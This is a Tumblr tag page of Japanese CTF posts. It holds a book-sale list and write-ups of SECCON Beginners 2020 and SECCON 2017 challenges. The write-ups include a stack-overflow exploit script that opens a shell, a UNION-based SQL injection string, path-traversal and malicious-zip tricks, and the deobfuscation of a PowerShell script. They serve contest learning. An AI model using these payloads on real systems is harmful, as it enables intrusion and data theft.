#seccon ctf
Explore tagged Tumblr posts
Text
é人åºçäŒã»ãŒã«
é人åºçäŒã®ã§åé¡ããŸããè¶
ã»ãŒã«ãã£ãŠãã®ã§ãããã¶ã¿ãŠããæãã®ãã€ã®ãªã¹ãäœã£ãããããè²·ã£ãæ¬ã¯ã»ã»ã»èªãŸãªããã°ãããªããã»ã»ã»
https://tatsu-zine.com/books/
=======================================
ãåé¡ã çžé¢ä¿æ°Â
 https://tatsu-zine.com/books/correlation-coefficient
çžé¢ä¿æ°ã®èŸå
žã¿ãããªããããïŒé¢çœãã
ãåé¡ã Rustã§ã¯ãããOpenGL
https://tatsu-zine.com/books/rust-opengl
ããŒããWebGLã«èå³ãããã®ã§ãŸãã¯ãã£ã¡ãèªãã§ã¿ãã®ãããããïŒ
ããã°ã©ãã³ã°è±èªææ¬
https://tatsu-zine.com/books/programming-english-textbook
ã³ã¡ã³ããšãã³ãããã®æžãæ¹ãšããã€ãè¿·ãã»ã»ã»
ãåé¡ã äžèœã³ã³ãã¥ãŒã¿ãã©ã€ãããããããã¥ãŒãªã³ã°ãžã®éãã
https://tatsu-zine.com/books/universal-computer
ããããæ¬ãããä»ã®ïŒäººã¯ãã¡ããç¥ã£ãŠããã©ã«ã³ãã«ã£ãŠèããããšãªãååã
ãåé¡ãã³ã³ãã¥ãŒã¿çè«ã®èµ·æºïŒ»ç¬¬1巻ãã¥ãŒãªã³ã°
https://tatsu-zine.com/books/origin-computer-theory1
ãããããªïœïŒã 第1å·»ãããªãã®ãã»ã»ã»ã解説ã€ããŠãã®ãããããã°ã°ã£ããããåºãŠãããã©èš³ã ããããªããŠåæãèŒããŠãããŠã»ããã£ããããçŽã§ã»ãããããããªããã©è²·ã£ãŠããæ¬²ããã£ããèããã
ãŠãã±ãŒãžåè«
https://tatsu-zine.com/books/unicage-genron
宿
ãåé¡ã å®è·µã»èªç¶èšèªåŠçã·ãªãŒãº 第6å·»ãã¯ãã³ãåæã·ã¹ãã ã®äœãæ¹
https://tatsu-zine.com/books/anlp-kuchikomi
ä»äºãšè¿ããããªè¿ããªããããªãèªã¿ãããããªèªã¿ãããªããããªã»ã»ã»
ãœãããŠã§ã¢ã»ãã¹ãï¿œï¿œï¿œææ³ã第2ç
https://tatsu-zine.com/books/the-art-of-software-testing
çŽç2006幎ãã»ã»ã»ãã¡ãã£ãšå€ãããª
ãåé¡ã æ ªãšPythonâèªäœããã°ã©ã ã§ãéå²ããç®æãæ¬
https://tatsu-zine.com/books/stock-and-python
æ ªãè¶£å³ã®èŠªæããããã©ããŸãã¡è©±ã«ã€ããŠãããªãã®ã§ããã§å匷ããã®ããããããããããªã
ãåé¡ã ã°ã©ãçè«å
¥é(åæžç¬¬4ç)
https://tatsu-zine.com/books/introduction-to-graph-theory-4ed
åè2018幎ã§ãããããäžåçã®ãšãããžã§éããªããŠæç§æžè²·ããªãã£ãããã°ã©ãçè«ã®æ¬ãäžåãæã£ãŠãªããã ããªã»ã»ã»
仿§æžã®èªã¿æ¹ãšæžãæ¹
https://tatsu-zine.com/books/reading-writing-specification
ãã€ãé©åœã«æžããŠãããäžåºŠãããã¯æ¬ãèªãã§ãè¯ãã®ããªã»ã»ã»ã147ããŒãžã ã£ãããããªã«åããªããšæãã
ãåé¡ãHugoã§å§ããéçãµã€ãæ§ç¯å
¥éãéçãµã€ããžã§ãã¬ãŒã¿ãŒã§äœãèªäœãµã€ã
https://tatsu-zine.com/books/hugo-ssg
TumblerãããŠHugoãããããªããšããã£ãŠããã2021å¹Žã®æ¬ã ããããã
ãåé¡ã 容éåžå Žã®çå®ã第1åå
¥æã®å€±æã詳现åæ
https://tatsu-zine.com/books/youryou-shijou
容éåžå Žã£ãŠã¯ãããŠèãåèªã
ã¬ããŒãžã³ã¬ã¯ã·ã§ã³ã®ã¢ã«ãŽãªãºã ãšå®è£
https://tatsu-zine.com/books/gcbook
å®ããè¯ããããªãã ãã©ç¿æ³³ç€Ÿã®ãã€ããŸã èªããŠãªããã ããª
ãåé¡ã Rust+ECSã§ã²ãŒã éçº -ã²ãŒã ãšã³ãžã³Amethystã®ã¹ã¹ã¡-
https://tatsu-zine.com/books/rust-ecs-amethyst
Amethystãrust game-devã°ã«ãŒãã®ãã€ãªã®ã§äœåãã¿ãããšãããã©äœ¿ã£ãããšã¯ãªããbevy-engineãšããšæ¯ã¹ãŠã¡ãã£ãšãã€ããªãšæã£ãŠããŒãã«ãã£ãããæ¬èªãã§ã¿ããšãããããã
ãåé¡ã Chiselãå§ããã人ã«èªãã§æ¬²ããæ¬
https://tatsu-zine.com/books/begging-chisel
ãã£ãšChisel䜿ã£ãŠã¿ãããšæã£ãŠããã©ãŸãšãŸã£ãæ
å ±ã¿ãããšãªãã£ãããæ¬ããã£ãã®åããŠç¥ã£ãŠããããã£ããæ°ã«ãªã
ãåé¡ã ã°ã©ãã»ãããã¯ãŒã¯ã¢ã«ãŽãªãºã ã®åºç€ âæ°çãšCããã°ã©ã
https://tatsu-zine.com/books/graph-network-algorithms-no-kiso
ãã£ã¡ããã¯äžã«æžããŠãããã€ã®ã»ããããããªãå®çªã®ãã€ããããªããããšãã£ã±ãã©å®çªã®ãã€ã¯çŽã§ã»ãã
ã»ãã¥ãªãã£ã³ã³ãã¹ããã£ã¬ã³ãžããã¯
https://tatsu-zine.com/books/seccon-challengebook
詳解ã»ãã¥ãªãã£ã³ã³ãã¹ã
https://tatsu-zine.com/books/ctfbook
ãåé¡ã è§£é¡pwnable ã»ãã¥ãªãã£ã³ã³ãã¹ãã«ææŠãããïŒ
https://tatsu-zine.com/books/pwnable
CTFãã£ãããšãªãããã£ãŠã¿ããïŒãã§ãå
¥éæžã¯ãªããå®çªãããæ°ããã
Kaggle Grandmasterã«åŠã¶ æ©æ¢°åŠç¿ å®è·µã¢ãããŒã
https://tatsu-zine.com/books/kaggle-grandmaster-ml
Kaggleã³ã³ããã£ã·ã§ã³ ãã£ã¬ã³ãžããã¯
https://tatsu-zine.com/books/kaggle-ml
æè¿Kaggle倧çäžããŠãŠæå¿«ã ããä¹
ãã¶ãã«ã¡ãã£ãšãã£ãŠã¿ãŠãããã®ããããã
ãåé¡ã äžçæšæºMITæç§æžãã¹ãã©ã³ã°ïŒç·åœ¢ä»£æ°ã€ã³ãããã¯ã·ã§ã³ãåæžç¬¬4ç
https://tatsu-zine.com/books/introduction-to-linear-algebra-4ed
ããã¯è©å€ãããŠãèš³ãã ãã ã£ãŠã¬ãã¥ãŒãã£ããã©ãããŸã§ã¯ã²ã©ãç¡ãæ°ãããã»ã»ã»ïŒ
ãåé¡ã äžçæšæºMITæç§æžïœã¹ãã©ã³ã°ïŒç·åœ¢ä»£æ°ãšããŒã¿ãµã€ãšã³ã¹
https://tatsu-zine.com/books/linear-algebra-and-data-science
ããã¯èš³ã®è©å€ãã²ã©ããã ããª
ãåé¡ã äžçæšæºMITæç§æžïœã¹ãã©ã³ã°ïŒåŸ®åæ¹çšåŒãšç·åœ¢ä»£æ°
https://tatsu-zine.com/books/differential-equations-and-linear-algebra
ãããèš³ã®è©å€ãã²ã©ããã ããª
ãåé¡ã äžçæšæºMITæç§æž Pythonèšèªã«ããããã°ã©ãã³ã°ã€ã³ãããã¯ã·ã§ã³ç¬¬2ç ããŒã¿ãµã€ãšã³ã¹ãšã¢ããªã±ãŒã·ã§ã³
https://tatsu-zine.com/books/python-programming-introduction-2ed
ãåé¡ã äžçæšæºMITæç§æžãPythonèšèªã«ããããã°ã©ãã³ã° ã€ã³ãããã¯ã·ã§ã³
ãåé¡ã ã»ãžãŠã£ãã¯:ã¢ã«ãŽãªãºã C 第1~4éšïŒâåºç€ã»ããŒã¿æ§é ã»æŽåã»æ¢çŽ¢â
https://tatsu-zine.com/books/algorithm-c-1-4
https://tatsu-zine.com/books/python-programming-introduction
ãè²·ãåŸã ãã©ãããŸãèå³ãªããª
ãåé¡ã ã«ãŒãã²ãŒã å¶äœãæ¯ããæè¡
https://tatsu-zine.com/books/cardgame-development
ããã¡ãã£ãšããããããã§æ°ã«ãªã£ã¡ãããª
0 notes
Quote
Favorite tweets: ïœå¹
åºãæ¥çããæ³šç®ãéããæ¥æ¬æå€§ã®CTFã³ã³ãã¹ãïœã»ãã¥ãªãã£ã³ã³ãã¹ããSECCON CTFã12æ11æ¥(å)-12æ¥(æ¥)éå¬ https://t.co/z9gkIwXH8y è³éç·é¡100äžããããã©ãCapture The PacketãããããïŒïŒ â ã»ããã (@takahoyo) Nov 19, 2021
http://twitter.com/takahoyo
0 notes
Text
SECCON Beginners CTF 2020ã®ç£èŠã»ãªãã¬ãŒã·ã§ã³ãæ¯ããæè¡ - ãã³é
¢ããã°(β) [ã¯ãŠãªããã¯ããŒã¯]
SECCON Beginners CTF 2020ã®ç£èŠã»ãªãã¬ãŒã·ã§ã³ãæ¯ããæè¡ - ãã³é
¢ããã°(β)
LifeMemoryTeamã®@atponsã§ããä»åã®SECCON Beginners CTF 2020ã¯ã楜ãã¿ããã ããã§ãããããᅵᅵᅵåã¯éå¶ãã€ã³ãã©æŽåãããŠãããŸããã ä»åã¯ãèªåãæ
åœããŠããç£èŠããªãã¬ãŒã·ã§ã³éšåã®æ§ç¯åãã«ã€ããŠæžããŠãããŸãã æ»æŽ»ç£èŠ ï¿œï¿œããž ä»ååå è
ã®ã¿ãªããã«ã¯ããã®ãããªãããžãåé¡ã«ä»äžããŠæ...
from kjw_junichiã®ã¯ãŠãªããã¯ããŒã¯ https://ift.tt/2ZuZ1y6
0 notes
Text
SECCON Beginners CTF 2020 writeup
writeupãšããã®ãäœãªã®ãããããã£ãŠãªãã§ãããããã£ãœãã®ãæžããŠã¿ãŸããCTFæŽã¯2018幎ã®ctf4b以æ¥2åç®ã§ãã
Welcome
Discordã«è²ŒãããFlagãå
¥ããã ãã
Spy
ãªã¹ãã«ããååãé©åœã«å
¥ããŠã¿ããšãäžç¬ã§ã¬ã¹ãã³ã¹ãè¿ãæãããã°1ç§ããããããæãããã 1ç§ããããã€(ãã¶ãæå·åãšãã§æéããã£ãŠãã)ããã€ããŠãã§ãã¯ãããã°ããã
R&B
é ã«Rãã€ããŠããROT13ã®éãé ã«Bãã€ããŠããBase64ã®Decodeãããã°ãããPythonä¹
ã
ã«æžãäžã«Python3ã¯åã ã£ãã®ã§bytesãšstrã®å倿ã§ãšãŸã©ã£ãã
import base64 flag = b'BQlVrOUllRGxXY2xGNVJuQjRkVFZ5U0VVMGNVZEpiRVpTZVZadmQwOWhTVEIxTkhKTFNWSkdWRUZIUlRGWFUwRklUVlpJTVhGc1NFaDFaVVY1Ukd0Rk1qbDFSM3BuVjFwNGVXVkdWWEZYU0RCTldFZ3dRVmR5VVZOTGNGSjFTMjR6VjBWSE1rMVRXak5KV1hCTGVYZEplR3BzY0VsamJFaGhlV0pGUjFOUFNEQk5Wa1pIVFZaYVVqRm9TbUZqWVhKU2NVaElNM0ZTY25kSU1VWlJUMkZJVWsxV1NESjFhVnBVY0d0R1NIVXhUVEJ4TmsweFYyeEdNVUUxUlRCNVIwa3djVmRNYlVGclJUQXhURVZIVGpWR1ZVOVpja2x4UVZwVVFURkZVblZYYmxOaWFrRktTVlJJWVhsTFJFbFhRVUY0UlZkSk1YRlRiMGcwTlE9PQ==' def b64decode(s): return base64.b64decode(s) def rrot13(s): def f(x): ch = x if ord('a') <= ch and ch <= ord('z'): ch = ch - 13 if ch < ord('a'): ch += ord('z') - ord('a')+1 elif ord('A') <= ch and ch <= ord('Z'): ch = ch - 13 if ch < ord('A'): ch += ord('Z') - ord('A')+1 return ch return bytes([f(x) for x in s]) while True: print(flag, flag[0]) if flag[0] == ord(b'B'): flag = b64decode(flag[1:]) elif flag[0] == ord(b'R'): flag = rrot13(flag[1:]) else: print("unkwno") exit()
mask
Ghidraã§éã¢ã»ã³ãã«ãããšããã2ã€ã®ããããã¹ã¯ã«å¯ŸããŠFLAGã1æåãã€ANDããšã£ãŠãçµæãããããæåŸ
ããæååã«ãªããããã§ãã¯ããŠããã 2ã€ã®ããããã¹ã¯ã®æ
å ±ãåããããå
ã®FLAGã埩å
ã§ããã®ã§ã埩å
ããã
package main import ( "fmt" ) func main() { k1 := "atd4`qdedtUpetepqeUdaaeUeaqau" k2 := "c`b bk`kj`KbababcaKbacaKiacki" m1 := byte(0x75) m2 := byte(0xeb) for i := 0; i < len(k1); i++ { var b byte b = (k1[i] & m1) | (k2[i] & m2) fmt.Printf("%c", b) } }
Beginner's Stack
é©åœã«åããŠã£ããRSP is misaligned!ã£ãŠèšãããã ã©ãããã°ããã®ããããããããã£ããã©ãé£ã°ãå
ã®é¢æ°ã¢ãã¬ã¹ã+1ããã倧äžå€«ã ã£ã(ããããããâŠ)ã
from socket import * from struct import * from time import sleep from telnetlib import Telnet s = socket(AF_INET, SOCK_STREAM) s.connect(("bs.quals.beginners.seccon.jp", 9001)) s.send(b'\x00\x00\x00\x00\x00\x00\x00\x00'*5+b'\x62\x08\x40\x00\x00\x00\x00\x00\x00') t = Telnet() t.sock = s t.interact()
ã°ã°ã£ããšããtelnetlibãšããã®ã䜿ã£ãŠããæ¹ãããã®ã§ç䌌ããã Pythonã¯æšæºã©ã€ãã©ãªãè±å¯ã§ããããªããšããããŸããã
readme
/ããã®ãã¹ã§ããããšãctfãšããæååãå«ãŸãªãããšãšããå¶çŽãããã æåãšã¹ã±ãŒãã·ãŒã±ã³ã¹ãšãã§ããã°ãã°åé¿ã§ããããšæã£ãŠè©Šãããã©ããŸããããªãã£ãã ãã®åŸã/proc/self/cwdçµç±ã®çžå¯Ÿãã¹ãªããããããšãããã£ãã ã«ã¬ã³ããã£ã¬ã¯ããªã¯/proc/self/environã®PWDããåããã
emoemoencode
Flagã®ãã©ãŒãããçã«ctf{xxx}ãªã®ã§ãæåã®æåãcã«çžåœãããšããŠã·ãŒã¶ãŒåŸ©å·ããã°ããã
s = "ð£ðŽðŠðŽð¢ð»ð³ðŽð¥ð§ð¡ð®ð°ð§ð²ð¡ð°ðšð¹ðð¢ð¹ðð¥ðð°ð°ð°ð°ð°ð°ðªð©ðœ" ss = "" for c in s: d = ord(c)-127843+ord('c') print(ord(c), chr(d)) ss += chr(d) print(ss)
Tweetstore
'ã\'ãšãšã³ã³ãŒãããŠãããã\'ãå
¥åããã°\\'ã«ãªãã®ã§ã·ã³ã°ã«ã¯ãªãŒããéããããšãã§ããã ããšã¯ã³ã¡ã³ãã§åŸç¶ã®ã¯ãšãªãç¡èŠããŠã\' UNION select user, user, now() --ãsearch wordã«å
¥ããã°è§£ããã
unzip
https://github.com/ptoomey3/evilarc ããã§directory traversalãªzipãã€ãã£ãããããã
python evilarc.py flag.txt --depth 7 --os unix
sneaky
Ghidraã§éã¢ã»ã³ãã«ãããšããããœãŒã¹ãè€éã§ããããããªãã£ãã é©åœã«ãœã¡ãœã¡èŠãŠããã¡ããã©GAMEOVERåºåããŠãã£ãœããšããããã£ãŠã ãã®è¿èŸºã§10000ãšãã宿°ãšæ¯èŒããŠããã³ãŒãããã£ï¿œï¿œã 10000ããã€ã¹ã³ã¢éŸå€ãªãããâŠãšæãããã€ããªãšãã£ã¿ã§å®è¡ãã¡ã€ã«ãæžãæããŠ0ã«ããŠã¿ãã 10000(0x0f27)ãåºãŠãããšããã¯4ç®æãã£ãŠã1åã ãæžãæããã ãšã ãã§ãå
šéšæžãæãããšããã¢ã€ãã ã1ååãã ãã§OKã«ãªã£ãã
0 notes
Link
0 notes
Text
SECCON 2017 Online
12/9-10ã®24æéãSECCONãªã³ã©ã€ã³äºéžããããŸãããæµ·å€å¢ãå«ãèš1028ããŒã ãåå ããŠããããã§ããçµæã¯53äœã§ãããåœå
ããŒã ã®ãªãã§ã¯12äœãªã®ã§ã2æã«éå¬ãããåœå
決å倧äŒãžé²ãããã§ãã
putchar music - Programming 100
å顿ã¯ã€ãã®ãšããã
This one line of C program works on Linux Desktop. What is this movie's title? Please answer the flag as SECCON{MOVIES_TITLE}, replace all alphabets with capital letters, and spaces with underscores.
main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}
äžãããããœãŒã¹ãã³ã³ãã€ã«ããŸããincludeæã远å ããŠã-lm ãªãã·ã§ã³ãä»ããŠã³ã³ãã€ã«ã
#include #include
main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}
$ gcc a.c -lm
å®è¡ãããšæšæºåºåã«å€§éã®ããŒã¿ãæµããŠããŸãããããåçãããšæ ç»ã®é³æ¥œãæµããŠããŸããPCã®ç°å¢ã«ãã£ãŠé³ã鳎ã£ãã鳎ããªãã£ããïŒ
$ a.out | aplay åçäž raw ããŒã¿ 'stdin' : Unsigned 8 bit, ã¬ãŒã 8000 Hz, ã¢ãã©ã«
flag㯠SECCON{STAR_WARS}
SHA-1 is dead - Crypto 100
å顿ã¯ã€ãã®ãšããã
SHA-1 is dead
http://sha1.pwn.seccon.jp/ Upload two files satisfy following conditions:
file1 != file2 SHA1(file1) == SHA1(file2) SHA256(file1) SHA256(file2) 2017KiB 2017KiB
1KiB = 1024 bytes
SHA1è¡çªãçºçãã2ã€ã®ãã¡ã€ã«ãäœæããããã§ãã SHA1ãšããã°ãããã·ã¥è¡çªãããã¡ã€ã«ãå®éã«çæããããšè©±é¡ã«ãªã£ãä»¶ã§ããã
https://shattered.io/
SHA1ãè¡çªãããã¡ã€ã«ã¯æ¢ã«ããã®ã§ãããšã¯ãã¡ã€ã«ãµã€ãºã®æ¡ä»¶ãæºããã°OKã ããã·ã¥å€èšç®ã®ä»çµã¿ãããããã·ã¥å€ãåã2ã€ã®ãã¡ã€ã«ã«åãããŒã¿ã远èšããå Žåã远èšåŸã®ãã¡ã€ã«ã®ããã·ã¥ã¯åã³äžèŽããã¯ãã äžèšãµã€ãããè¡çªãçºçãã2ã€ã®PDFãã¡ã€ã«ãããŠã³ããŒãããŸãã
-rwxrwxrwx 1 root root 422435 12æ 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12æ 9 17:12 shattered-2.pdf
2017KiBãã倧ãã2018KiBããå°ãããã¡ã€ã«ã欲ããã®ã§ãµã€ãºãèšç®ããã
422435 bytes / 1024 = 412 KiB (shattered.ioã®PDFãã¡ã€ã«ãµã€ãº) 2017 KiB - 412 KiB = 1605 KiB (远èšãã¹ãããŒã¿ã®ãµã€ãº)
ããšã¯é©åœãªãããŒããŒã¿ãPDFã«è¿œèšããã ãã
$ python -c "print '\xff'*1024*1605" > ff $ cat shattered-1.pdf ff > 1.pdf $ cat shattered-2.pdf ff > 2.pdf
$ ls -lrt åèš 6468 -rwxrwxrwx 1 root root 422435 12æ 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12æ 9 17:12 shattered-2.pdf -rwxrwxrwx 1 root root 1643521 12æ 9 17:24 ff -rwxrwxrwx 1 root root 2065956 12æ 9 17:24 1.pdf -rwxrwxrwx 1 root root 2065956 12æ 9 17:25 2.pdf
$ sha1sum 1.pdf 2.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 1.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 2.pdf
$ sha256sum 1.pdf 2.pdf f240399f72872cccc4e24fd91431bc604b5668cf7ba7e6a1ee35ad58edd43f40 1.pdf 89873267dd5f3da340e1304409aecfc1bcbd89e5428192834f6f1cc7a6902a11 2.pdf
SHA1ãè¡çªãã2ã€ã®ãã¡ã€ã«ãåŸãããŸããããããåé¡ãµã€ãã«ãµããããããŠçµäºã flag㯠SECCON{SHA-1_1995-2017?}
Powerful_Shell - Binary 300
å顿ã¯ã€ãã®ãšããã
Crack me. powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024
äžãããããã¡ã€ã«ã¯ãããªæããPower Shellã®ã¹ã¯ãªãããé£èªåãããŠããïŒ
$ECCON=""; $ECCON+=[char](3783/291); $ECCON+=[char](6690/669); $ECCON+=[char](776-740); $ECCON+=[char](381-312); $ECCON+=[char](403-289); $ECCON+=[char](-301+415); $ECCON+=[char](143-32); $ECCON+=[char](93594/821); $ECCON+=[char](626-561); $ECCON+=[char](86427/873); $ECCON+=[char](112752/972); $ECCON+=[char](43680/416); $ECCON+=[char](95127/857);
(çç¥)
$ECCON+=[char](873-863); $ECCON+=[char](721-708); $ECCON+=[char](803-793); $ECCON+=[char](10426/802); Write-Progress -Activity "Extracting Script" -status "20040" -percentComplete 99; $ECCON+=[char](520-510); Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))
Windowsã®ããã©ã«ãã ãšã¹ã¯ãªããå®è¡ãããªã·ãŒã§å¶éãããŠããããŸãã¯ã¹ã¯ãªãããå®è¡å¯èœã«ããããã«ãPowerShellã管çè
æš©éã§èµ·åããŠä»¥äžã®ã³ãã³ããå®è¡ããã
PS C:\work> Set-ExecutionPolicy RemoteSigned
ã¹ã¯ãªããå®è¡ãããšSECCONã®ç»åã衚瀺ããããäœãã®ãã§ãã¯ã§çµäºããŠããæš¡æ§ã
é£èªåãããŠãããšãã£ãŠãæè©®ã¯ã¹ã¯ãªãããªã®ã§æåŸã®ã»ãã§evalçãªããšãããŠããã®ã§ã¯ãšæãã ããããããšãããæ¢ããŠããã³ãŒããããŠèªã¿ããããªã£ãç¶æ
ã®ã³ãŒã(ãããã¯ããšæ³å®ããŠ)ãåºåããŠã¿ãã
æåŸã®è¡ã倿ŽããŠãã¡ã€ã«åºå
(倿Žå) Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))
(倿ŽåŸ) Write-Progress -Completed -Activity "Extracting Script";[ScriptBlock]::Create($ECCON)|Out-File -FilePath C:\work\output.ps1 -Encoding Ascii
å床å®è¡ãããšããã³ãŒããããã¹ã¯ãªãããåŸããããã¡ãªã¿ã«ãã®ã¹ã¯ãªããããããã¬ã«ããå®è¡ãæ€ç¥ãããšçµäºããããã«ãªã£ãŠããã
PS C:\work> .\powerful_shell.ps1
ãšãã£ãŠããŸã é£èªåãããŠããã®ã ãã ã·ã³ã¿ãã¯ã¹ãšã©ãŒãããã®ã§æ¹è¡ã³ãŒããè¥å¹²ä¿®æ£ãããšå®è¡ã§ããã ãŸããåŠçäžã«å®è¡ç°å¢ã®ãã§ãã¯ãããŠããã®ã§ãã®éšåãã¹ãããããŠå®è¡ãããšãã¢ãã®éµç€ããå®éã«é³ããªããããïŒ(èªåã®ç°å¢ã§ã¯ããŸããªããªãã£ã)
åŠçã®åŸåã§ã¯ãæ£ããããŒå
¥å(ãã¢ãæŒå¥)ãåºã«çæããéµã䜿ã£ãŠãXORã§ããŒã¿åŸ©å·ããŠããã
(çç¥)
$text=@" YkwRUxVXQ05DQ1NOE1sVVU4TUxdTThBBFVdDTUwTURVTThMqFldDQUwdUxVRTBNEFVdAQUwRUxtT TBEzFVdDQU8RUxdTbEwTNxVVQUNOEFEVUUwdQBVXQ0NOE1EWUUwRQRtVQ0FME1EVUU8RThdVTUNM EVMVUUwRFxdVQUNCE1MXU2JOE0gWV0oxSk1KTEIoExdBSDBOE0MVO0NKTkAoERVDSTFKThNNFUwR FBVINUFJTkAqExtBSjFKTBEoF08RVRdKO0NKTldKMUwRQBc1QUo7SlNgTBNRFVdJSEZCSkJAKBEV QUgzSE8RQxdMHTMVSDVDSExCKxEVQ0o9SkwRQxVOE0IWSDVBSkJAKBEVQUgzThBXFTdDRExAKhMV Q0oxTxEzFzVNSkxVSjNOE0EWN0NITE4oExdBSjFMEUUXNUNTbEwTURVVSExCKxEVQ0o9SkwRQxVO EzEWSDVBSkJAKBEVQUgzThAxFTdDREwTURVKMUpOECoVThNPFUo3U0pOE0gWThNEFUITQBdDTBFK F08RQBdMHRQVQUwTSBVOEEIVThNPFUNOE0oXTBFDF0wRQRtDTBFKFU4TQxZOExYVTUwTSBVMEUEX TxFOF0NCE0oXTBNCFU4QQRVBTB1KFU4TThdMESsXQ04TRBVMEUMVThNXFk4TQRVNTBNIFUwRFBdP
(çç¥)
E0QVTUwTSBVMEUYXTxFAF0NCE0oXTBNCFU4QFhVBTB1KFU4TQBdMEUIXQ04TRBVMEUAVThNDFkFM EUobTBNDFUwRFBdAThNIFUITQRdME0wVQU8RShdMHUMVThMoF0wRNhdDThNEFUwRRhVOEzEWQUwR ShtME0EVTBFGF0BOE0gVQhNDF0wTVxVBTxFKF0wdQxVOEygXTBE2FxROE10VShZOTBFTF2E= "@
$plain=@() $byteString = [System.Convert]::FromBase64String($text) $xordData = $(for ($i = 0; $i -lt $byteString.length; ) { for ($j = 0; $j -lt $f.length; $j++) { $plain+=$byteString[$i] -bxor $f[$j] $i++ if ($i -ge $byteString.Length) { $j = $f.length } } }) iex([System.Text.Encoding]::ASCII.GetString($plain))
ããŒã¹ãããŒã¯å
¥åãç
§åããŠããã³ãŒãéšåãèªãã§éµãç¹å®ããã
$f="hhjhhjhjkjhjhf"
ããã«ã埩å·åŸã®ããŒã¿ããã¡ã€ã«åºåããããã«ã¹ã¯ãªãããä¿®æ£ããŠå®è¡ã
(倿Žå) iex([System.Text.Encoding]::ASCII.GetString($plain))
(倿ŽåŸ) [System.Text.Encoding]::ASCII.GetString($plain)|Out-File -FilePath C:\work\output3.ps1 -Encoding Ascii
ããããŠåŸããã埩å·åŸã®ã¹ã¯ãªããã¯ãŸã é£èªåãããŠãããã倿°åãèšå·ã«ãªã£ãŠããã®ã§ãããããã
${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;}; ${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;}; ${"}="["+"$(@{})"[${)}]+"$(@{})"["${}${|}"]"$(@{})"["${@}\({}"]+"\)?"[${+}]+"]"; ${;}"".("$(@{})"["${}${[}"]"$(@{})"["${}${(}"]"$(@{})"[${}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]); ${;}"$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (çç¥)
ãŸãæåŸã®è¡ã«çç®ããŠããã³ãŒãåŸã®ã¹ã¯ãªãããåºåããã
(倿Žå) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (çç¥)
(倿ŽåŸ) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"]; Write-Host "${"}${.}${(}+\({"}\)
åºåçµæã¯ãã¡ãããŸããŸãé£èªåãããŠãã
[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]61+[CHar]82+[CHar]101+[CHar]97+[CHar]100+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]45+[CHar]80+[CHar]114+[CHar]111+[CHar]109+[CHar]112+[CHar]116+[CHar]32+[CHar]39+[CHar]69+[CHar]110+[CHar]116+[CHar]101+[CHar]114+[CHar]32+[CHar]116+[CHar]104+[CHar]101+[CHar]32+[CHar]112+[CHar]97+[CHar]115+[CHar]115+[CHar]119+[CHar]111+[CHar]114+[CHar]100+[CHar]39+[CHar]13+[CHar]10+[CHar]73+[CHar]102+[CHar]40+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]32+[CHar]45+[CHar]101+[CHar]113+[CHar]32+[CHar]39+[CHar]80+[CHar]48+[CHar]119+[CHar]69+[CHar]114+[CHar]36+[CHar]72+[CHar]51+[CHar]49+[CHar]49+[CHar]39+[CHar]41+[CHar]123+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]39+[CHar]71+[CHar]111+[CHar]111+[CHar]100+[CHar]32+[CHar]74+[CHar]111+[CHar]98+[CHar]33+[CHar]39+[CHar]59+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]34+[CHar]83+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]123+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]125+[CHar]34+[CHar]13+[CHar]10+[CHar]125|iex
å床ãæåŸã®ç®æã§é£èªåè§£é€åŸã®ã¹ã¯ãªãããåºåãããã倿Žã
å®è¡ããŠåŸãããçµæããã¡ãããããããŽãŒã«ïŒ
$ECCON=Read-Host -Prompt 'Enter the password' If($ECCON -eq 'P0wEr$H311'){ Write-Host 'Good Job!'; Write-Host "SECCON{$ECCON}" }
flag㯠SECCON{P0wEr$H311}
Ps and Qs - Crypto 200
å顿ã¯ã€ãã®ãšããã
Decrypt it. psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip (pass:seccon2017)
äžããããZipãã¡ã€ã«ã®äžèº«ã¯æå·æãšå
¬ééµ2ã€ã§ãã
Archive: psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip Length Date Time Name âââ -â -â ---- 512 12-09-17 01:33 cipher 800 12-09-17 01:33 pub1.pub 800 12-09-17 01:33 pub2.pub
$ openssl rsa -in pub1.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:cf:cf:bb:ee:a7:df:14:3a:8a:c2:08:b1:aa:1d: 2f:86:54:5a:c4:cb:58:8c:94:a3:fb:1c:14:ad:91: a4:f0:b9:36:15:7c:5a:4b:86:9c:18:a8:b8:64:f4: (çç¥)
